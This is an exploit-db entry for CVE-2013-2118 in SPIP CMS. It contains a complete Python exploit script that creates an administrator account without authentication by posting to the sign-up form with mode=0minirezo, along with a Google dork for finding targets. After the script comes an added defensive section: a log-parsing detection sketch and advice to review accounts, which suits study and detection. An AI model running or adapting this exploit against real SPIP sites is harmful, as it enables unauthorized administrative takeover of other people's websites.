SPIP CMS < 2.0.23 / 2.1.22 / 3.0.9 - Privilege Escalation

19 May 2014 00:00:00 | Reported by Gregory Draperi | Type: exploitdb | Source: www.exploit-db.com

SPIP CMS Privilege Escalation to Administrator Account

Related

| Reporter | Title | Published |
|---|---|---|
| CVE | CVE-2013-2118 | 9 Jul 2013 17:00 |
| Cvelist | CVE-2013-2118 | 9 Jul 2013 17:00 |
| Debian CVE | CVE-2013-2118 | 9 Jul 2013 17:00 |
| Tenable Nessus | Debian DSA-2694-1 : spip - privilege escalation | 28 May 2013 00:00 |
| EUVD | EUVD-2013-2087 | 9 Jul 2013 17:00 |
| exploitpack | SPIP CMS 2.0.23 / 2.1.22 / 3.0.9 - Privilege Escalation | 19 May 2014 00:00 |
| NVD | CVE-2013-2118 | 9 Jul 2013 17:55 |
| OpenVAS | Debian: Security Advisory (DSA-2694-1) | 25 May 2013 00:00 |
| OpenVAS | Debian Security Advisory DSA 2694-1 (spip - privilege escalation) | 26 May 2013 00:00 |
| OSV | DEBIAN-CVE-2013-2118 | 9 Jul 2013 17:55 |

#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.

'''
import urllib, urllib2
import cookielib
import sys
import re

def send_request(urlOpener, url, post_data=None):
   request = urllib2.Request(url)
   url = urlOpener.open(request, post_data)
   return url.read()

if len(sys.argv) < 4:
   print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
   exit()

base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]

cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))


formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."


m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));


formulaire_data = {'var_ajax' : 'form',
                   'page' : 'identifiants',
                   'mode' : '0minirezo',
                   'formulaire_action' : 'inscription',
                   'formulaire_action_args' : m.group(0),
                   'nom_inscription' : login,
                   'mail_inscription' : mail,
                   'nobot' : ''
                  }
formulaire_data = urllib.urlencode(formulaire_data)


send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"


print "[+] You should receive an email with credentials soon :) "
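
For defenders, the two requests the script above makes leave a recognizable trace in web server access logs: a GET and then a POST to `spip.php?page=identifiants&mode=0minirezo`. The following detection sketch is an added example, not part of the original exploit-db entry; the "combined" access log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log format: Apache/nginx "combined" (ip, timestamp, request line, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def find_admin_signup_requests(lines):
    """Return (ip, timestamp, method, status) for every request to the SPIP
    sign-up page (page=identifiants) that carries mode=0minirezo."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        url = urlsplit(m["target"])
        if not url.path.endswith("/spip.php"):
            continue
        # parse_qs percent-decodes values, so mode=%30minirezo is caught too.
        query = parse_qs(url.query)
        if "identifiants" in query.get("page", []) and "0minirezo" in query.get("mode", []):
            hits.append((m["ip"], m["ts"], m["method"], m["status"]))
    return hits

def completed_sequences(hits):
    """Client IPs that fetched the form (GET) and later submitted it (POST)."""
    seen_get, flagged = set(), []
    for ip, _ts, method, _status in hits:
        if method == "GET":
            seen_get.add(ip)
        elif method == "POST" and ip in seen_get and ip not in flagged:
            flagged.append(ip)
    return flagged

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/May/2014:10:00:01 +0000] "GET /spip.php?page=identifiants&mode=0minirezo HTTP/1.1" 200 5120 "-" "Python-urllib/2.7"',
    '198.51.100.7 - - [19/May/2014:10:00:02 +0000] "POST /spip.php?page=identifiants&mode=0minirezo HTTP/1.1" 200 4310 "-" "Python-urllib/2.7"',
    '203.0.113.20 - - [19/May/2014:10:05:11 +0000] "GET /spip.php?page=identifiants&mode=6forum HTTP/1.1" 200 5098 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [19/May/2014:10:07:30 +0000] "GET /cms/spip.php?page=identifiants&mode=%30minirezo HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [19/May/2014:10:08:00 +0000] "GET /spip.php?article12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_admin_signup_requests(SAMPLE_LOG)
    for hit in hits:
        print("admin sign-up request:", hit)
    print("GET then POST from:", completed_sequences(hits))
```

Any hit on an installation that still runs an affected version is worth following up by reviewing recently created administrator accounts and outgoing mail logs, since the script relies on the password being sent by mail.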

Vulners AI Score: 6.7 (Medium risk)
CVSS 2: 7.5
EPSS: 0.11956